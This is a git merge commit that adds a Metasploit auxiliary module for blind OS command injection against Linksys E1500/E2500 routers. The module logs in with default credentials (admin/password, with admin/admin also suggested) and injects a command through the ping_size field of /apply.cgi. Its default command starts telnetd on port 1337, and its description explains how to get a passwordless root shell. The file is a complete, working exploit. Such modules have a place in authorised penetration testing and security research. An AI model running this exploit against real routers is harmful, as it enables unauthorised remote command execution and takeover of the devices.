Merge branch 'linksys-e1500-e2500-exec' of https://github.com/m-1-k-3/metasploit-framework into m-1-k-3-linksys-e1500-e2500-exec

modules/auxiliary/admin/http/linksys_e1500_e2500_exec.rb

@@ -0,0 +1,112 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+#   http://metasploit.com/
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Auxiliary
+
+	include Msf::Exploit::Remote::HttpClient
+
+	def initialize(info = {})
+		super(update_info(info,
+			'Name'            => 'Linksys E1500/E2500 Remote OS Command Execution',
+			'Description'     => %q{
+					Some Linksys Routers are vulnerable to OS Command injection.
+				You will need credentials to the webinterface to access the vulnerable part
+				of the application. Default credentials are always a good starting point.
+				admin/admin or admin/password could be a first try.
+				Note: This is a blind os command injection vulnerability. This means that you will
+				not see any output of your command. Try a ping command to your local system for a
+				first test.
+
+				Hint: To get a remote shell you could start telnetd and touch /etc/group. Use the 
+				user root without a password for accessing the device.
+			},
+			'Author'          => [ 'm-1-k-3' ],
+			'License'         => MSF_LICENSE,
+			'References'      =>
+				[
+					[ 'URL', 'http://homesupport.cisco.com/de-eu/support/routers/E1500' ],
+					[ 'URL', 'http://www.s3cur1ty.de/m1adv2013-004' ],
+					[ 'EDB', '24475' ],
+					[ 'OSVDB', '89912' ],
+					[ 'BID', '57760' ]
+				],
+			'DisclosureDate' => 'Feb 05 2013'))
+
+		register_options(
+			[
+				OptString.new('USERNAME',[ true, 'User to login with', 'admin']),
+				OptString.new('PASSWORD',[ true, 'Password to login with', 'password']),
+				OptString.new('CMD', [ true, 'The command to execute', 'telnetd -p 1337'])
+			], self.class)
+	end
+
+	def run
+		uri = '/apply.cgi'
+		user = datastore['USERNAME']
+		pass = datastore['PASSWORD']
+
+		print_status("#{rhost}:#{rport} - Trying to login with #{user} / #{pass}")
+
+		begin
+				res = send_request_cgi({
+						'uri'     => uri,
+						'method'  => 'GET',
+						'authorization' => basic_auth(user,pass)
+						})
+
+				return if res.nil?
+				return if (res.code == 404)
+
+			if [200, 301, 302].include?(res.code)
+				print_good("#{rhost}:#{rport} - Successful login #{user}/#{pass}")
+			else
+				print_error("#{rhost}:#{rport} - No successful login possible with #{user}/#{pass}")
+				return
+			end
+
+		rescue ::Rex::ConnectionError
+				vprint_error("#{rhost}:#{rport} - Failed to connect to the web server")
+				return
+		end
+
+
+		print_status("#{rhost}:#{rport} - Sending remote command: " + datastore['CMD'])
+
+		cmd = datastore['CMD']
+		#original post request:
+		#data_cmd = "submit_button=Diagnostics&change_action=gozila_cgi&submit_type=start_ping&
+		#action=&commit=0&ping_ip=1.1.1.1&ping_size=%26#{cmd}%26&ping_times=5&traceroute_ip="
+
+		vprint_status("#{rhost}:#{rport} - using the following target URL: #{uri}")
+		begin
+			res = send_request_cgi(
+				{
+					'uri'    => uri,
+					'method' => 'POST',
+					'authorization' => basic_auth(user,pass),
+					'vars_post' => {
+						"submit_button" => "Diagnostics",
+						"change_action" => "gozila_cgi",
+						"submit_type" => "start_ping",
+						"action" => "",
+						"commit" => "0",
+						"ping_ip" => "1.1.1.1",
+						"ping_size" => "&#{cmd}&",
+						"ping_times" => "5",
+						"traceroute_ip" => ""
+						}
+				})
+		rescue ::Rex::ConnectionError
+			vprint_error("#{rhost}:#{rport} - Failed to connect to the web server")
+			return
+		end
+		print_status("#{rhost}:#{rport} - Blind Exploitation - unknown Exploitation state")
+		print_status("#{rhost}:#{rport} - Blind Exploitation - wait around 10 seconds till the command gets executed")
+	end
+end